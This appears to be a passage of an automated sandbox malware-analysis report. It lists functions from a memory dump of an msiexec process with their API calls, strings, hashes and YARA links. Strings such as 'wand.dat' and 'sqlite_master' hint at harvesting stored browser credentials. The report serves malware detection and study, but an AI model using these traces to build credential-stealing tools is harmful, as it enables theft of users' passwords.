                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpymemset
                                                                            • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                            • API String ID: 1297977491-2063813899
                                                                            • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                            • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                            • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                            • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                            Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040560C
                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                              • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                            • String ID: *.*$dat$wand.dat
                                                                            • API String ID: 2618321458-1828844352
                                                                            • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                            • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                            • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                            • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                            Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                              • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                            • wcslen.MSVCRT ref: 00410C74
                                                                            • _wtoi.MSVCRT(?), ref: 00410C80
                                                                            • _wcsicmp.MSVCRT ref: 00410CCE
                                                                            • _wcsicmp.MSVCRT ref: 00410CDF
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                            • String ID:
                                                                            • API String ID: 1549203181-0
                                                                            • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                            • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                            • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                            • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                            Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00412057
                                                                              • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                            • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                            • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                            • GetKeyState.USER32(00000010), ref: 0041210D
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                            • String ID:
                                                                            • API String ID: 3550944819-0
                                                                            • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                            • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                            • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                            • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                            Function 0040F508 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • free.MSVCRT ref: 0040F561
                                                                            • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                            • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$free
                                                                            • String ID: g4@
                                                                            • API String ID: 2888793982-2133833424
                                                                            • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                            • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                            • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                            • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                            Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                            • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                            • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy
                                                                            • String ID: @
                                                                            • API String ID: 3510742995-2766056989
                                                                            • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                            • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                            • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                            • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                            Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                            • memset.MSVCRT ref: 0040AF18
                                                                            • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@??3@memcpymemset
                                                                            • String ID:
                                                                            • API String ID: 1865533344-0
                                                                            • Opcode ID: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                                            • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                            • Opcode Fuzzy Hash: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                                            • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                            Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004144E7
                                                                              • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                              • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                            • memset.MSVCRT ref: 0041451A
                                                                            • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                            • String ID:
                                                                            • API String ID: 1127616056-0
                                                                            • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                            • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                            • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                            • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                            Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                            • memset.MSVCRT ref: 0042FED3
                                                                            • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$memset
                                                                            • String ID: sqlite_master
                                                                            • API String ID: 438689982-3163232059
                                                                            • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                            • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                            • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                            • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                            Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                            • wcscpy.MSVCRT ref: 00414DF3
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                            • String ID:
                                                                            • API String ID: 3917621476-0
                                                                            • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                            • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                            • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                            • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                            Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                            • _snwprintf.MSVCRT ref: 00410FE1
                                                                            • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                            • _snwprintf.MSVCRT ref: 0041100C
                                                                            • wcscat.MSVCRT ref: 0041101F
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                            • String ID:
                                                                            • API String ID: 822687973-0
                                                                            • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                            • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                            • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                            • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                            Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                            • malloc.MSVCRT ref: 00417459
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7591DF80,?,0041755F,?), ref: 00417478
                                                                            • free.MSVCRT ref: 0041747F
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$freemalloc
                                                                            • String ID:
                                                                            • API String ID: 2605342592-0
                                                                            • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                            • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                            • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                            • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                            Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                            • RegisterClassW.USER32(?), ref: 00412428
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                            • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule$ClassCreateRegisterWindow
                                                                            • String ID:
                                                                            • API String ID: 2678498856-0
                                                                            • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                            • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                            • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                            • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                            Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                            • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                            • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                            • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Item
                                                                            • String ID:
                                                                            • API String ID: 3888421826-0
                                                                            • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                            • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                            • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                            • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                            Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00417B7B
                                                                            • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                            • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                            • GetLastError.KERNEL32 ref: 00417BB5
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: File$ErrorLastLockUnlockmemset
                                                                            • String ID:
                                                                            • API String ID: 3727323765-0
                                                                            • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                            • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                            • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                            • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                            Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040F673
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                            • strlen.MSVCRT ref: 0040F6A2
                                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                            • String ID:
                                                                            • API String ID: 2754987064-0
                                                                            • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                            • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                            • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                            • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                            Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040F6E2
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                            • strlen.MSVCRT ref: 0040F70D
                                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                            • String ID:
                                                                            • API String ID: 2754987064-0
                                                                            • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                            • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                            • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                            • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                            Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00402FD7
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                            • strlen.MSVCRT ref: 00403006
                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                            • String ID:
                                                                            • API String ID: 2754987064-0
                                                                            • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                            • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                            • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                            • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                            Function 00414770 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 40COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: wcscpy$CloseHandle
                                                                            • String ID: General
                                                                            • API String ID: 3722638380-26480598
                                                                            • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                            • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                            • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                            • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                            Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                              • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                              • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                            • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                            • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                            • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                            • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                            • String ID:
                                                                            • API String ID: 764393265-0
                                                                            • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                            • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                            • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                            • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                            Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                            • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Time$System$File$LocalSpecific
                                                                            • String ID:
                                                                            • API String ID: 979780441-0
                                                                            • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
